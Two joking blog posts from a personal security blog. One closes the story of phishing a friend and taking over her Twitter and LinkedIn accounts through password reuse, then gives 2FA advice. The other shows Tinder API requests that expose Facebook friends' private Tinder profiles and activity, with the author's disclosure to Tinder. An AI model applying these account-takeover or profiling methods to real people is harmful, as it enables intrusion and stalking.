<p>The combo move in this is setting her password to <code class="language-plaintext highlighter-rouge">qwerty1</code>. When I phished her email password, she tried to log in to her email with <code class="language-plaintext highlighter-rouge">qwerty1</code> <em>even though that’s not her password</em>. This tells me that she <em>thinks</em> her password for everything is <code class="language-plaintext highlighter-rouge">qwerty1</code>, or at least, that’s what she’ll try if she’s not sure. The technical term for this is <em>next-level mindgames</em>💻💻💻.</p>
<p>I do the steps above, and I’m now logged in to Diana’s Twitter account. I tighten up her Twitter security settings because I’m a Good Boy.
I HOPE that Diana will be able to log back in as well, and not wonder why she suddenly got logged out. I wait stressfully for her to tweet something, and after a day or so she retweets a cute doggo, so we’re good to go.</p>
<p>Now I want to do the same thing on popular dating website LinkedIn. This will involve signing Diana out of LinkedIn on all her devices, and I don’t want her to get too suspicious, so I wait a week. I do the same process as with Twitter. This time I don’t even wait until Diana is asleep, because I’m young and invincible.</p>
<p>As I’m setting Diana’s password on LinkedIn back to <code class="language-plaintext highlighter-rouge">qwerty1</code>, LinkedIn doesn’t let me.</p>
<p><img src="https://i.imgur.com/IpOA2iv.png" alt="moresecurepassword" /></p>
<p>Is this because <code class="language-plaintext highlighter-rouge">qwerty1</code> was a password present in the LinkedIn hack in 2012? Or because it’s just a common password?
For a brief moment I panic, but then I realise I can just set Diana’s password to her email password, <code class="language-plaintext highlighter-rouge">wertyu2</code>.</p>
<p>Astute readers will have noticed this little guy in the screenshot above.</p>
<p><img src="https://i.imgur.com/XYkmZAp.png" alt="littleguy" /></p>
<p>LinkedIn is asking me if I’d like to log out of Diana’s LinkedIn account on all devices while I’m resetting the password. That’s <em>REAL</em> nice of you to offer old mate LinkedIn but I’m absolutely <em>golden</em> as it is in terms of logouts so <em>don’t even worry about it</em> I’ll be just fine how it is <em>NO REALLY</em> don’t trouble yourself, I’m sure your CPU cycles are busy displaying everyone’s 6000 word <em>Thinkpieces</em> about “Cyber” for “Non-technical Business Decision Makers”.</p>
<p><img src="https://i.imgur.com/1oxZfKR.png" alt="zoomed" /></p>
<p>Yeah so I submit that form 100% checkbox-free, and Diana remains logged in to LinkedIn on all her devices, none the wiser.</p>
<h2 id="step-2-bring-in-the-green-boys">Step 2: Bring in the green boys</h2>
<p>I enlist the help of a talented friend to photoshop everyone’s #1 boy next door Luigi subtly into Diana’s profile picture on Twitter, like a green guardian angel.</p>
<p>I can’t show you Diana’s pictures, so here’s me doing similar photoshops to Your Boy And Mine, Five Time Celebrity MasterChef Winner And The Inventor of Bitcoin, Give It Up For Dr. Barack Obama Everybody:</p>
<p><img src="https://i.imgur.com/00gDWzz.png" alt="obama1" />
<img src="https://i.imgur.com/RyiWH2b.png" alt="obama2" /></p>
<p>At about this time I <a href="https://twitter.com/mangopdf/status/883633939054706688">tweet</a> about our sweet green boy so that if Diana sees her guardian angel Luigi, she’ll know it was me. This is like my calling card except…. well it’s not <em>really</em> like a calling card it’s pretty dorky to be honest but just LOOK at that wholesome lad, you just <em>KNOW</em> he’d help you fix a flat tyre, and he’d just be too gosh darn polite to correct you if you said “thanks green mario” so really if you think about it I guess it IS like a calling card.</p>
<p>Next up I log into her LinkedIn account, get overwhelmed by her 15 LinkedIn notifications, 7 new profile views, 11 new Key People To Bother, and several pop ups telling me about new features I can use to invite people to join my professional network on LinkedIn™®©. Then I change her profile picture to my really good version.</p>
<p>For about a week, Diana continues her Twitter and LinkedIn(?) usage whilst being silently Luigi’d.
Diana goes on viewing what I can only assume to be the sharpest international political discourse on Twitter, and getting slightly more LinkedIn profile views from observant recruiters who are also fans of the hit 2001 ghostbusting game, Luigi’s Mansion.</p>
<p>Well that just about wraps up Operation Luigi. Glad that’s all done and dusted.</p>
<p>Although…</p>
<p>I’m basically a Luigi <em>technician</em> at this point, and it would be a <em>shame</em> to let all that work go to waste. So let’s just do</p>
<p>~<em>one more thing</em>~</p>
<h2 id="operation-waluigi-a-dark-turn-for-mature-audiences">Operation Waluigi: A dark turn for mature audiences</h2>
<p>Waluigi, true to his character, is much more direct.</p>
<p><img src="https://i.imgur.com/nZpK7KG.png" alt="waluigilinkedin" /></p>
<p><em>Damn RIGHT</em> this new profile strength is “Advanced.”</p>
<p>Please enjoy these half-baked opsec-enabled<sup id="fnref:opsec" role="doc-noteref"><a href="#fn:opsec" class="footnote" rel="footnote">26</a></sup> tweets<sup id="fnref:believe" role="doc-noteref"><a href="#fn:believe" class="footnote" rel="footnote">27</a></sup>.</p>
<p><img src="https://i.imgur.com/eNwheAO.png" alt="twitterbio" />
<img src="https://i.imgur.com/PE4IcF4.png" alt="waluigitweet" />
<img src="https://i.imgur.com/P4F6Vpp.png" alt="omg" />
<img src="https://i.imgur.com/Uo8aO3U.png" alt="hacked" />
<img src="https://i.imgur.com/07xgNIL.png" alt="waa" />
<img src="https://i.imgur.com/RuFsxTT.png" alt="greenboy" /></p>
<p>I also make Diana follow a bunch of Waluigi fan accounts (there are a <em>lot</em>), Nintendo of America, and @EmojiAquarium because it’s a damn good account.</p>
<h1 id="part-5-epilogue">Part 5: Epilogue</h1>
<p>Diana likes her new Waluigi life so much she keeps it all up there, and even changes her Facebook photo to a Waluigi’d one.</p>
<p>I meet up with her and ask her about her side of the story a few days later.</p>
<p>Here are some choice quotes:</p>
<p>“I’ve since listened to a <em>lot</em> of Waluigi songs”
“Waluigi is the ultimate symbol of postmodernism, he exists only as a foil”</p>
<p>I ask her “How do you think I did it?”. She says I must have hacked her email and reset her Twitter password, but she has no idea how I hacked her email.</p>
<p>When I show her the email chain with Kathleen on my computer her jaw drops for several seconds.</p>
<p>“You catfished me!”</p>
<p>We go back to the same ramen place after the interview. The credits roll.</p>
<h2 id="wait-but-i-am-very-afraid-after-reading-this-blog-post-how-do-i-not-get-360-noscope-hacked-like-diana-tho">“wait but i am very afraid after reading this blog post, how do I not get 360 noscope hacked like diana tho”</h2>
<p>Hey kids, it’s me, “Alex”. We’ve had a lot of fun today, but now it’s time to talk about the <em>real</em> issues. The moral of this story is that it’s really easy for someone else to know your password. Fret not, for you are young and extremely online, and it’s not too late for you yet.</p>
<p>Step 1: Go to https://haveibeenpwned.com and type in your email address. This doesn’t actually do anything, it’s just to instill sufficient fear in you.</p>
<p>Step 2<sup id="fnref:passwordmanagers" role="doc-noteref"><a href="#fn:passwordmanagers" class="footnote" rel="footnote">28</a></sup>: Go to your email and enable “Two-step Authentication”. You can go to <a href="https://www.google.com.au/landing/2step/">https://www.google.com.au/landing/2step</a> if you use gmail. If you use Hotmail then I dunno, there’s probably like a SkyCloud 360 X LIVE subscription you can buy that lets you do it.</p>
<p><img src="https://citwiki.oberlin.edu/images/2/29/Google-two-step-verification1.png" alt="2fa" /></p>
<p>Now, as well as your email password, you also type in a code from an app on your phone. Or you can have the code SMSed to you on your pastel-pink flip phone if you wanna relive the 90s<sup id="fnref:authapp" role="doc-noteref"><a href="#fn:authapp" class="footnote" rel="footnote">29</a></sup>.</p>
<p>If Diana had Verified Good Content Two-step Authentication turned on, then I would have had to get a two-factor code AND her password. I would have had to either:</p>
<ul>
<li>Phish the code as well as the password (but the code expires in less than 60 seconds)</li>
<li>Physically go to the same place as her, connect to the same WiFi, and steal her browser session</li>
<li>Email her a Word Doc with a macro in it that gives me control of her laptop, and steal her browser cookies from it</li>
<li>Call up her phone provider and trick them into pointing her phone number at my SIM card</li>
</ul>
<p>All of these are more work and higher risk, and so hackers often just move on to lower hanging fruit. That’s you in this situation. You’re the delicious fruit. And the hackers are…. giraffes? Yeah. Watch out for giraffes.</p>
<hr />
<p><em>Freshly baked shoutouts to My <a href="https://twitter.com/GracieNoLag">Absolute</a> <a href="https://twitter.com/adam_chal">Homeslices</a> for being my blog-review senpais, Diana for being chill, and to the hacking software released at DEFCON 25: Aerobatic dot io</em></p>
<p><em>If you want to talk to me about this, hit me up in the tweet zone: <a href="https://twitter.com/mangopdf">@mangopdf</a>.</em></p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:flubs" role="doc-endnote">
<p>A careless mistake <a href="#fnref:flubs" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:fate" role="doc-endnote">
<p>Obviously the best way is to not give permission to meeeeeeeee😎 <a href="#fnref:fate" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:findinglinkedin" role="doc-endnote">
<p>I found her LinkedIn by just googling her name #pwned <a href="#fnref:findinglinkedin" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:hackervoice" role="doc-endnote">
<p>wait did he just say “hacker voice I’m in”? <a href="#fnref:hackervoice" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:haventrealised" role="doc-endnote">
<p>I haven’t realised yet that successfully resetting Diana’s iCloud password would lock her out of her account and violate our agreement. This is because I’m a weapons-grade bozo. <a href="#fnref:haventrealised" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:fantasybeach" role="doc-endnote">
<p>On haveibeenpwned.com, Diana’s email address shows up in a data dump from this website. It’s a game of some sort? <a href="#fnref:fantasybeach" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:googledocs" role="doc-endnote">
<p>Later when I interview Diana, she says “I use exclusively Google Docs”, so I was right! No comment about the avocado thing. <a href="#fnref:googledocs" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:salted" role="doc-endnote">
<p>I’m not making these up, these are real words that real hackers use I swear. <a href="#fnref:salted" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:nolinkedin" role="doc-endnote">
<p>Diana didn’t have LinkedIn in 2012, so she’s not in the list. But some of the 20 people who had the same password as her sure did. <a href="#fnref:nolinkedin" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:insecure" role="doc-endnote">
<p>tag urself lol <a href="#fnref:insecure" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:passwordguessing" role="doc-endnote">
<p>I also try guessing what her password could be based on the password I already have for her (<code class="language-plaintext highlighter-rouge">qwerty1</code>) but it doesn’t work. <a href="#fnref:passwordguessing" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pretty" role="doc-endnote">
<p>low <a href="#fnref:pretty" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:easy" role="doc-endnote">
<p>effort <a href="#fnref:easy" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:myhotmail" role="doc-endnote">
<p>From 2002 do NOT @ me <a href="#fnref:myhotmail" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:loggedin" role="doc-endnote">
<p>This makes <em>no sense</em>, since she’ll be reading her Hotmail, and then asked to log in to <em>the same thing she’s already reading</em>, but NON-fake websites have bad enough UX that this is believable. <a href="#fnref:loggedin" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:goodstuff" role="doc-endnote">
<p>I steal all that good stuff after the URL from the Google sign-in page <code class="language-plaintext highlighter-rouge">;>_></code> <a href="#fnref:goodstuff" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:loginscreen" role="doc-endnote">
<p>Awkwardly, Hotmail changed its login screen shortly before this blog post came out. It <em>used</em> to look like that I swear. <a href="#fnref:loginscreen" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:attention" role="doc-endnote">
<p>There are a few reasons this email wasn’t attention grabbing. It was automated, from a company (not an actual human), and wasn’t specifically about her, but about her account. <a href="#fnref:attention" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:lookupthecompany" role="doc-endnote">
<p>When I interview her later, Diana says she looked up the company! She even says that getting back to Kathleen was on her to-do list, the poor thing. <a href="#fnref:lookupthecompany" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:glance" role="doc-endnote">
<p>Months later, I notice I’ve left a “Lorem ipsum dolor sit amet, consectetur adipiscing elit” as a dot point on the resume. <a href="#fnref:glance" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:suggestion" role="doc-endnote">
<p>This is a genius suggestion from one of my <a href="https://twitter.com/GracieNoLag">~<em>hacker connections</em>~</a>. <a href="#fnref:suggestion" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gaslighted" role="doc-endnote">
<p>At this point Diana has been completely gaslighted as to what her hotmail password is, because my phishing site said the wrong password was right, and then said the right password was wrong, and she thinks it’s the real Hotmail. <a href="#fnref:gaslighted" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gov1" role="doc-endnote">
<p>I mean it WOULD be pretty funny <a href="#fnref:gov1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gov2" role="doc-endnote">
<p>And wow you could do anything, book flights, get a job, change your name… <a href="#fnref:gov2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:gov3" role="doc-endnote">
<p>Just letting any Government Agents reading this know that I did NOT end up doing anything with this and I love democracy. <a href="#fnref:gov3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:opsec" role="doc-endnote">
<p>If you <em>really</em> tried you could probably find Diana’s Twitter from these. You would then be a hacking genius, binary flowing through your veins, and have a CVE number assigned to your personally. I, a humble wannabee, am relying on your strict ethics to prevent you from, uh, stalking the friend of some guy whose blog post you read. You can do it. I believe in you. <a href="#fnref:opsec" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:believe" role="doc-endnote">
<p>Having said that, I don’t <em>really</em> have an overwhelming amount of faith in the idea that someone won’t try to do that. You can stay chilled out, dear reader, since before this blog was published Diana and I had a nice chat and fixed up her personal security. <a href="#fnref:believe" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:passwordmanagers" role="doc-endnote">
<p>Password managers like <a href="https://lastpass.com">LastPass</a> are also good for giving you unique passwords, but I reckon 2FA is the best effort:security ratio value For Normal People Tee Em. <a href="#fnref:passwordmanagers" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:authapp" role="doc-endnote">
<p>But, this is less secure, since your phone number can still be hijacked. <a href="#fnref:authapp" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>mangopdfIt's probably easier if you just read it. Salty Hacker News commentsStalking your Facebook friends on Tinder2016-07-21T05:02:38+00:002016-07-21T05:02:38+00:00/stalking-your-facebook-friends-on-tinder<p>Whoa hello hey look I think I made a thing that lets you see the Tinder
profiles of your Facebook friends. That’s Tinder photos, bios, and the last
time they were on Tinder. You can also swipe right on their Tinder profiles,
even if Tinder doesn’t suggest them to you. I think this has some pretty
~spooky~ privacy implications, and this post is about how it works.</p>
<p>I told Tinder that I found this thing, and they said it was a feature, not a
bug. If you want to skip the blog post and just get straight to swiping right
on your friends and downloading their Tinder profiles, <a href="https://github.com/defaultnamehere/tinder-detective">here’s the GitHub
repository</a>.</p>
<p>Otherwise… Get ready for some texttttttt</p>
<hr />
<p>Hey what up it’s me ya friendly neighbourhood homeslice Alex comin’ atcha’
LIVE with some phresh new #content. That’s <em>right</em> it’s the inevitable
disappointing sequel to <a href="https://mango.pdf.zone/graphing-when-your-facebook-friends-are-awake">“Graphing when your Facebook friends are awake”</a>
streamed to your screen in HIGH DEFINITION TEXT.</p>
<p>For the sake of helping you find the parts of this post that are <em>not</em>
gratuitous gags (it’s easier that way), I’ve put the important parts <strong>in
bold</strong>. I have also put <em>some parts</em> in <em>italics</em> for <em>emphasis</em> and other times
<em>as a quote</em>. I’ve also noticed that sometimes things are in bold <strong>or</strong>
<em>italics</em> <strong>seemingly at random</strong>, <em>overall</em> reducing the <strong>helpfulness</strong> of the
whole thin<strong>g</strong>.</p>
<h2 id="im-a-time-traveller-from-2004-and-i-dont-know-what-tinder-is">I’m a time traveller from 2004 and I don’t know what Tinder is</h2>
<p>Invest now in emoji they’re gonna be BIG.</p>
<p>Tinder is a “Lifestyle” app (apps are like websites but worse) that lets you
‘Anonymously “like” or “pass” people Tinder suggests’. I read it on the login
screen to their app so it must be true.</p>
<p>Now that we’re all up to speed, you know how Tinder has profiles? They’re the
page someone looks at when they decide whether to swipe left or right on you.
Normally you only appear to people that Tinder chooses to show your profile
to. Anyway so one day my phone rings and it’s President Obama saying “Alex my
son you absolute ledge, go see if Tinder has any weird secret APIs you can use
to do something cool idk” and I was all “rest easy baz m8 I’m on the case”</p>
<h2 id="story-time">Story time</h2>
<p>Cut to me in my room. I’m about to try and “do hacking”. Around me are two
computer monitors, two laptops, and no friends. It’s 10pm on a Saturday night
and I’ve decided that I want to poke around on Tinder (not like that) and see
if I can find anything interesting (also not like that).</p>
<p>The first step is to use the Tinder app and see what the app does, in the
hopes of catching it doing something silly.</p>
<p>But I don’t have a Tinder account, and I don’t plan to. (But it’s okay if
<em>you</em> use Tinder. That’s not what this post is about.)</p>
<p>The only way to sign up for a Tinder account is by signing in with your
Faceook account, but I don’t want to use mine. I happened to have an
absolutely true blue <a href="https://www.facebook.com/terms">Terms-of-Service-
Compliant</a> <em>spare</em> Facebook account lying
around, so I made a Tinder account with this Facebook account. I had to pick a
profile photo for the account so I picked uhhhhhhh</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-
tinder/c8dd3f93a079f3b3e5b0f7c2057d4254598bf6f25663ef39469748deac2f9fa3.jpg" alt="image" /></p>
<p>I have alarmingly little justification for this so it’s probably better if you
just keep reading.</p>
<h2 id="mad-dawg-y-dawg-31337-el8-hacking-sk1llz">Mad-dawg-y dawg 31337 el8 hacking #sk1llz</h2>
<p>I wanted to see what the Tinder app was doing behind the scenes, kinda like
how you can put on your hoodie, yell “hold my calls” to nobody in particular,
click <em>“Inspect Element”</em> on a web page, and call yourself a hacker. This will
let you see all the stuff that the page is sending and receiving and also
finally make people respect you for the edgelord you are. You can’t <em>“Inspect
Element”</em> on an app, so I used <a href="https://mitmproxy.org/">mitmproxy</a> to spy on
my phone.</p>
<p>mitmproxy is an elite hacker tool that lets me view data the Tinder app was
sending to and from my phone and increases my fedora size by 7000%. I
installed mitmproxy’s provided 103% legit artisanal HTTPS certificate to my
phone, which gives me the master keys to decrypt whatever my phone sends to
and from Tinder servers. I go and edit my phone’s WiFi proxy settings to say
<em>“HEY big guy you know how you thought that the internet was over THERE well
actually my laptop is the internet so you can just send all your data there
instead okay yeah sick one”</em>. Since my phone is now politely sending all the
good stuff to my laptop instead of my router, I can use my laptop to spy on
all the internet connections my phone is making.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-
tinder/a1330752ffee8c258a014acb540961102f7cdd985c9b2079b9c010e175e3c0bc.png" alt="image" /></p>
<p>Here we can see that my phone is talking to an API at api.gotinder.com. It’s
telling Tinder “hey, I’m online and about to start swiping furiously so I hope
<a href="http://tech.gotinder.com/caching-architectures/">your AWS load-balancers</a> are
ready for this”, and asking the server for a list of faces to swipe. It’s also
sending some gentle analytics like where I am, the make and model of my phone,
who my phone provider is, and whether I have Tinder Plus, the Money Edition of
Tinder.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-
tinder/7229afc95992adf646b345b6e7676cba410a59d18ed865a3aeaccc7c56ae69a0.png" alt="image" /></p>
<p>At this point, like in general, I don’t really know what I’m looking for or
even how this app works. There’s something about swiping people right.
Sometimes you let your friends use your account to chat with strangers. That’s
all I got. The app seems to aggressively want me to be excited about it but
I’m confused. I’m just here to try to catch this app doing something silly
behind the scenes and try and fix it.</p>
<hr />
<p>Since I don’t know what I’m looking for, I try everything. I change <em>all</em> the
settings. I’m now a 20 year-old Flamingo interested in Men and Women from age
18 to 30 from up to 100km away (roughly 200,000 “Make America Great Again”
hats laid end-to-end if you only know Freedom Units and need to visualise),
The first time someone’s face comes up I mess up and can’t figure out which
way is “right” and accidentally “pass” them. The app says “NOPE!” and I see
their face fade into the void. I’m already a judgement <em>machine</em> and I haven’t
even started. I furiously spam “Like” on a bunch of faces in the hopes that
someone will also “Like” my high-resolution flamingo picture. If someone
“matches” with me I’ll be able to chat with them, and a whole other section of
the app to poke around in will open up.</p>
<p>Nobody will ask any questions about the fact that my profile has only a single
photo, it’s of a flamingo, and that my bio is just “Flamingooooo”.</p>
<hr />
<p>Look I really thought my flamingo idea was going to be a good one but nobody
liked me back.</p>
<p><em>Fiiiiiiiiiine.</em></p>
<p>I googled “stock photos faces” and picked one of a lady in a hat. Yeah. A hat.
That’ll work. I cropped the photo slightly and added a subtle filter to
attempt to fool the most basic of reverse image searchers and then realised
that I really should probably consider going outside more I hear it’s pretty
high-resolution out there too.</p>
<p>Instead I go back to the Android guest user I’ve added to my phone with the
disposable email address the Facebook account uses. I set my phone to use my
laptop as a proxy, sending all traffic to the laptop before it hits the
internet so I can spy on myself. I change my photo to the hat lady and spam
some swipes right on some faces.</p>
<p>Almost <em>immediately</em> I’m informed that “It’s a match!” in some hipster cursive
font. (Probably <a href="http://www.dafont.com/lobster.font">Lobster</a>. Have you seen
that thing it’s <a href="https://emojityper.com">everywhere</a>.) My choices are “Send
a message” or “Keep swiping” (Fun fact, in an earlier version of the app,
“Keep swiping” read “Keep playing”.) I pick “Send a message”. I spy on the
network requests that the chat part of the app does but I can’t see the actual
message text for some reason. Is it not being sent over HTTP? Some other
protocol? Is it doing some XMPP or websockets sacrificial ritual? Is it
converting each message to base64, storing that base64 in italics in Times New
Roman in a PDF, inserting that PDF into a cell in a Microsoft Excel 2003
spreadsheet and ROT13-ing the whole thing? I’ll never know, I gave up and
stumbled on a way better feature.</p>
<h2 id="ive-always-wanted-tinder-in-group-form">“I’ve always wanted Tinder in group form”</h2>
<p>We’ve all felt it at one time or another. Good news. It’s finally here. If you
live in Australia like me, your Tinder account will have an option to check
out “Tinder Social”.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-
tinder/20e3004585f5f2c6a2119c28f169c15c8793dccdb5ca86646c809bd1d4cbc4ef.jpg" alt="image" /></p>
<p>Tinder Social is the whole swiping-chatting-meeting-up experience, but now
it’s with <em>groups</em> of people and you’ll have a <em>perfect</em> moment to spam “when
the whole squad is on point”.</p>
<p>That’s right, you too can exchange four messages with a group of stock photos,
just like the lucky folks in this mockup.</p>
<p>I took the picture above from Tinder’s <a href="http://blog.gotinder.com/introducing-tinder-social/">announcement blog
post</a>. I noticed that one
of the photos in this mockup is the same stock photo I used for my non-
flamingo Tinder photo and the internet feels a little smaller.</p>
<p>You might have a lot of <em>feelings</em> about this particular feature of Tinder,
and that’s okay with me. This blog post is long enough as it is though, and
you probably have to get going soon since you left something in the oven or
something, so I’m just going to move on if that’s alright with you.</p>
<hr />
<p>Because Tinder is really on the fence about whether it’s a parody of itself or
not, internally the app calls groups “squads”. Here’s an example:</p>
<blockquote>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"squads_discoverable": false,
"squads_only": false,
"can_create_squad": true
</code></pre></div> </div>
</blockquote>
<p>There’s really nothing I can say here so let’s just enjoy this special moment.</p>
<hr />
<p>If you haven’t heard of Tinder Social, it’s because it’s only in Australia for
now “as a test”. If it works Tinder might roll it out to the rest of the
world. (UPDATE: Plot twist, it launched in the US the same day this blog post
came out! See the bottom of this post for details.)</p>
<p>That’s right, Australia-production is <em>basically</em> a staging server at this
point. “We’ll just yolo-deploy this 176% legit “Tinder for Squads” to uhhh I
dunno let’s go with uhhhh Australia <em>just as a test</em> and if it works, great,
but if it turns out to be bad NO WORRIES MATES IT’S JUST <em>AUSTRALIA</em> LOL”.
What the <em>heck</em> Tinder I can’t believe you chose the <em>continent of Australia</em> as the A in your A/B test. What, do you think we’re second-class internet
citizens just because our internet is desperately struggling to hold up under
the weight of Netflix and it’s probably faster and cheaper to send a big file
to your mate on the other side of the country via a Kangaroo with a pouch full
of MicroSD cards than attempting to upload anything faster than 700Kbps? Even
if the Kangaroo gets lost and goes on a Pokewalk and is all like “hey guys
guess what I found a ZUBAT” then it’s STILL going to be faster than looking at
a website, your eyes wide in innocent horror being like “but I don’t
understand. Why isn’t uploading? Did I do something wrong? Did I break the
app?”. But it’s not your fault. Dry your eyes. I’m not crying. You’re crying.</p>
<h2 id="hey-ive-been-reading-this-for-like-a-long-time-can-you-get-to-the-stalking">Hey I’ve been reading this for like a long time can you get to the stalking</h2>
<p>my friends thing now?</p>
<p>Sorry it’s just that I get a bit s̫ͅt̀͊ͬr͒e̗̎s̠ͭͫseͧd͛͟ sometimes ya feel?</p>
<p>There’s no concept of “friends” on Tinder, only people who you have “matched”
with. So Tinder Social shows you your Facebook friends on Tinder and lets you
choose from them who to add to your group.</p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-
tinder/37d7cc91dc609517a090314b5e34bb8db52b3ac4a4ae889fe5d4932bac6c2ba7.png" alt="image" /></p>
<p>In the app you don’t see anything other than names and Facebook profile
pictures for your friends. But let’s just casually point mitmproxy at the
Tinder app while it brings up the “choose friends” screen.</p>
<blockquote>
<p>GET <strong>https://api.gotinder.com/group/friends</strong></p>
</blockquote>
<p>{“status”:200,”results”:[{“<strong>user_id</strong>”:”<strong>562…….ec8</strong>”,”name”:”[redacted]”,”photo”:[{“processedFiles”:…{“url”:”https://graph.facebook.com/[redacted]/picture?height=640&width=640”,”height”:640,”width”:640}]}],”in_squad”:false}</p>
<p>Mostly this is just names and profile photos of your Facebook friends, which
is nothing you couldn’t get from the official Facebook API. This data is from
a fake Tinder account I created to test my idea. But what about this part?</p>
<blockquote>
<p>“<strong>user_id</strong>”:”<strong>562…….ec8”</strong></p>
</blockquote>
<p>That’s the Tinder user id of this Facebook friend. (I’ve cut out some of it so
you can’t go stalking this account.) This id uniquely identifies a Tinder
account. Surely it can’t be THAT easy. Can it? What do you think? Vote on your
phones now!</p>
<hr />
<p>If you send:</p>
<blockquote>
<p>GET https://api.gotinder.com/user/562…….ec8</p>
</blockquote>
<p>Then Tinder sends back:</p>
<blockquote>
<p>{‘_id’: ‘562…….ec8’,<br />
‘bio’: “hi every1 im new!!!!!!! holds up spork my name is katy but u
can call me t3h PeNgU1N oF d00m!!!!!!!! lol…as u can see im very
random!!!!”,<br />
‘birth_date’: ‘1995-07-19T02:52:04.083Z’,<br />
‘birth_date_info’: ‘fuzzy birthdate active, not displaying real
birth_date’,<br />
‘common_friends’: [<common Facebook="" friends="" go="" here="">],
'common_likes': [<common Facebook="" likes="" go="" here="">],
'connection_count': [the number of people you’ve swiped (I think?) go
here],
'distance_mi': 1, // How far the person is from you right now
'gender': 1, // 1 is female, 0 is male. C’mon Tinder that’s not how
gender works
'name': 'Victoria', // Note that there’s no last name
'ping_time': '2016-07-16T02:51:45.475Z', // The last time the person was
on Tinder</common></common></p>
</blockquote>
<p>Yeah look I know you probably didn’t read that so let me explain. No no, it’s
fine, you don’t have to go back and read it now. It’s really no trouble.</p>
<p>If we have someone’s Tinder id, we can see:</p>
<ul>
<li>Tinder photos</li>
<li>Tinder bio (a short “about me”)</li>
<li>The last time they were on Tinder</li>
<li>How many people they’ve swiped (I think??)</li>
<li>A few other things, but you already knew them from Facebook</li>
</ul>
<p>Hey, look, you can see the last time someone was on Tinder.</p>
<p>According to Tinder, this feature is disabled. Here’s a screenshot <a href="https://www.gotinder.com/faq">of their
support page.</a></p>
<p><img src="/img/2016-07-21-stalking-your-facebook-friends-on-
tinder/b6ebf2fadd657a7e77460259d12a3d16f71daa00ae20e592586d38865d3d38cc.png" alt="image" /></p>
<p>I guess they only disabled it in the app screens, rather than changing what
the server sends to your phone.</p>
<p>Why, with information like that you could make graphs of when your
friends are using Tinder, and probably find out all sorts of interesting
things. Who <em>knows</em> what that information correlates with? Just an idea.</p>
<p>And hey, once you have someone’s Tinder user id, <strong>you can use the official
unofficial API to swipe left or right on them</strong> without waiting for them to
appear in the stream of people Tinder suggests to you.</p>
<p>You can swipe left or right on them like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET https://api.gotinder.com/{like|pass}/{id}
</code></pre></div></div>
<p>I’m not sure about this, but it looks like that people who have swiped right
on you appear earlier in the list of people Tinder suggests. So what I’m
saying here, is maybe you can <em>force</em> Tinder to let you “like” one of your
Facebook friends on Tinder? Then you’ll probably appear in their suggestions,
and if they “like” you back then you can just be like “haha wow fancy seeing
you on tinder” YOU SMOOTH CRIMINAL YOU ( ͡° ͜ʖ ͡°)</p>
<hr />
<h2 id="responsible-disclosure">“Responsible” disclosure</h2>
<p>tl;dr I tried to tell Tinder about this before I wrote this blog post but they
were all like:</p>
<p>¯\<em>(ツ)</em>/¯</p>
<p>You can skip this section if you don’t want to read a bug report. It’s okay. I
don’t mind. I’ll see you in the next section.</p>
<hr />
<p>This isn’t much of a “security vulnerability”, and it certainly doesn’t
deserve it’s own cool and funky name like
<a href="http://heartbleed.com/">Heartbleed</a>. But I thought I’d report it anyway, just
in case Tinder didn’t know about it.</p>
<p>I looked around on their site but I couldn’t find a “Security” section so I
just made a support ticket.</p>
<p>Here’s what I sent them in full (feel free to skip this):</p>
<p><em>This isn’t actually a support request. I actually want to report a security</em>
<em>vulnerability, but I couldn’t find where to do so.</em></p>
<p><em>Would you mind forwarding this to your security team? Thank you! <3</em></p>
<p><em>I found that I can find the Tinder profiles of any of my Facebook friends</em>
<em>who use Tinder.</em>
<em>This can all be done through the (un)official API, so I’m assuming it’s a</em>
<em>“feature” not a bug.</em></p>
<p><em>Steps to reproduce:</em></p>
<p><em>GET <code class="language-plaintext highlighter-rouge">api.gotinder.com/group/friends</code></em>
<em>-> Returns Tinder user ids for all my Facebook friends that have Tinder</em></p>
<p><em>GET <code class="language-plaintext highlighter-rouge">api.gotinder.com/user/<id></code></em>
<em>-> Returns, among other things, something like:</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> connection_count":1979...._id":"<tinder
